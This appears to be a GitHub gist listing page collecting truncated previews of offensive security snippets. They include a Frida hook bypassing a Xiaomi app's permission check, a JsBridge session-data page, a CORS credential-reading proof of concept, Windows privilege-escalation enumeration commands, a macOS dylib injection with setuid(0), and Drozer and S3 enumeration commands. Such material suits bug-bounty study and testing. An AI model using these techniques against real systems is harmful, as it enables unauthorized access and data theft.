michaellcader / gist:1c0227326c0611d95849201801b2751e
Created December 29, 2022 12:36 — forked from webserveis/gist:c0d61834232fec7790a4a736813c7b75
Install and Uninstall Android applications with Intents

In the Android source code you can find:

<activity android:name=".PackageInstallerActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <data android:scheme="content" />
        <data android:scheme="file" />
private String config(Config config, boolean z) {
if (z) {
SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext());
if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object
return new Response(202).toString();
}
}
this.mFM = new FeatureManager(config, this.mActivity.getClassLoader());
this.mPM = new PermissionManager(config);
return new Response(0).toString();
Java.perform(function() {
console.log("Starting hook");
var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager");
Activity.isValid.implementation = function () {
return true;
};
Java.choose("com.xiaomi.music.hybrid.internal.Config", {
onMatch: function(inst) {
<html>
<body>
<script src='remote-server/jsBridge-mix.js'> //host the jsBridge-mix.js from resources directory
JsBridge.invoke("get_session_data", {}, function(a) { //the a variable will contain the response JSON object from the Java code
var i = {};
i = a;
window.alert(JSON.stringify(i));
})
</script>
</body>
michaellcader / unwxapkg.py
Created September 8, 2022 06:41 — forked from Integ/unwxapkg.py
A useful tool for unpacking wxapkg files, with Python 3 support.
# coding: utf-8
# py2 origin author lrdcq
# usage python3 unwxapkg.py filename
__author__ = 'Integ: https://github.com./integ'
import sys, os
import struct
class WxapkgFile(object):
# GET Method
<script type="text/javascript">
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("get","victim.com/getUserInfo",true);
req.withCredentials = true;
req.send();
function reqListener(){alert(req.responseText);}
</script>
michaellcader / windows_privesc
Created August 5, 2022 06:28 — forked from sckalath/windows_privesc
Windows Privilege Escalation
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
// Get the hostname and username (if available)
hostname
echo %username%
// Get users
net users
net user [username]
michaellcader / inject.c
Created July 14, 2022 13:34 — forked from theevilbit/inject.c
DYLD_INSERT_LIBRARIES DYLIB injection in macOS / OSX deep dive
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>
#include <unistd.h> /* declares setuid() */
__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
setuid(0);
system("id");
printf("Hello from dylib!\n");
michaellcader / Drozer_command.md
Last active June 2, 2022 03:26 — forked from castexyz/drozer.md
[mobile]Drozer commands #bugbounty

Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.

* Starting a session
  * `adb forward tcp:31415 tcp:31415`
  * `drozer console connect`
  * `drozer console connect --server <ip>`
* List modules
  * `ls`
michaellcader / ffuf to enumerate s3
Last active June 2, 2022 03:19 — forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
[ffuf usage] Use wfuzz or ffuf to enumerate s3 #bugbounty
#!/bin/bash
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files: